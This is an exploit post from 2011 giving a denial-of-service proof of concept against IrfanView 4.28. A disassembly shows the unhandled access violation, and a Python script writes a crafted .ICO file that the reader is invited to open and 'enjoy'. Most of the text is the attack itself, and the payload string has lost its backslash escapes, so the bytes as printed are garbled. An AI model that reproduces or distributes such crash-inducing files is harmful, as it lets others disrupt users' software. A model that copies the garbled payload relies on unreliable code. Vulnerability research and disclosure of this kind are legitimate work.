Home / exploits IrfanView 4.28 .ICO Without Transparent Colour Denial Of Ser
Posted on 10 April 2011
# done by BraniX <branix@hackers.org.pl> # www.hackers.org.pl # found: 2011.04.07 # published: 2011.04.10 # tested on: Windows XP SP3 Home Edition # tested on: Windows XP SP3 Professional # App: IrfanView 4.28 # App Url: http://www.irfanview.com # i_view32.exe MD5: c6d9383c4119a59aad70dbc4a974b8b4 # DoS is caused by not handled Access Violation Exception in module i_view32.exe # It can be triggered from: # Local: C:Without Transparent Colour - DoS.ico # Remote: \MySecretServerWithout Transparent Colour - DoS.ico # 004162D0 8B4424 04 MOV EAX,DWORD PTR SS:[ESP+4] # 004162D4 B2 80 MOV DL,80 # 004162D6 8AC8 MOV CL,AL # 004162D8 53 PUSH EBX # 004162D9 80E1 07 AND CL,7 # 004162DC D2EA SHR DL,CL # 004162DE 8B4C24 0C MOV ECX,DWORD PTR SS:[ESP+C] # 004162E2 C1E8 03 SHR EAX,3 # 004162E5 8A1C08 MOV BL,BYTE PTR DS:[EAX+ECX] ; Invalid address -> Access Violation when reading # 004162E8 22D3 AND DL,BL # 004162EA 5B POP EBX # 004162EB F6DA NEG DL # 004162ED 1BD2 SBB EDX,EDX # 004162EF F7DA NEG EDX # 004162F1 8BC2 MOV EAX,EDX # 004162F3 C3 RETN filepath = "C:\Without Transparent Colour - DoS.ico" f = open(filepath, "wb") poc = 'x00x00x01x00x01x00x0Bx0Dx00x00x01x00x18x00x30x02x00x00x16x00x00x00x28x00x00x00xFFx00x00x00x1Ax00x00x00x01x00x18x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x1Ex17x14x1Cx23x14x1Cx23x14x2Dx26x16x1Cx23x14x1Cx23x14x1Cx23x14x35x27x24x36x33x35x2Cx33x4Bx2Cx33x4Bx00x00x00x1Cx23x14x1Cx23x14x1Cx23x14x1Cx23x14x1Cx23x14x3Fx39x48x48x54x67x33x29x34x36x33x35x2Cx33x4Bx44x46x65x00x00x00x36x33x35x56x58x76x64x67x87x35x44x4Dx1Ex17x14x64x67x87x65x78x96x35x27x24x36x33x35x2Cx33x4Bx48x54x67x00x00x00x27x34x33x65x78x96x65x78x96x48x54x67x56x55x67x77x76x98x44x44x56x25x24x24x3Fx39x48x44x44x56x48x54x67x00x00x00x44x44x56x44x46x65x36x33x35x67x66x77x65x59x90x67x66x99x56x55x67x25x24x24x3Fx39x48x44x44x56x44x46x65x00x00x00x77x69xCAx56x58x76x44x35x2Fx77x76x98x76x6Bx98x77x76x98x34x46x2Ex25x26x37x2Cx33x4Bx3Fx39x48x48x54x67x00x00x00x65x59x90x44x44x56x55x49x65x51x47x46x55x56x58x34x46x2Ex36x33x35x36x33x35x2Cx33x4Bx2Cx33x4Bx47x56x76x00x00x00x75x69x88x55x49x65x52x55x8Bx46x43x44x36x33x35x44x44x56x44x44x56x3Fx39x48x3Fx39x48x3Fx39x48x56x58x76x00x00x00x67x66x77x44x44x56x55x49x65x55x49x65x56x58x76x65x59x90x55x49x65x3Fx39x48x33x29x34x3Fx39x48x56x58x76x00x00x00x55x49x65x55x49x65x55x49x65x65x59x90x67x66x99x65x59x90x55x49x65x3Fx39x48x33x29x34x44x44x56x64x67x87x00x00x00x4Fx49x56x55x49x65x55x49x65x56x55x67x65x59x70x64x67x87x56x58x76x3Fx39x48x2Cx33x4Bx44x46x65x54x69x8Cx00x00x00x55x49x65x55x49x65x55x49x65x55x49x65x65x59x90x65x59x90x55x49x7Ax3Fx39x48x3Fx39x48x56x58x76x65x78x96x00x00x00x65x59x90x56x58x76x52x55x8Bx65x59x90x6Cx58xB0x67x66x99x52x55x8Bx3Fx39x48x2Cx33x4Bx56x58x76x77x8FxABx00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00' f.write(poc) f.close() print "Done, 1 file generated on 'C:\' ..." print "Open this file in IrfanView 4.28 and enjoy ;)"
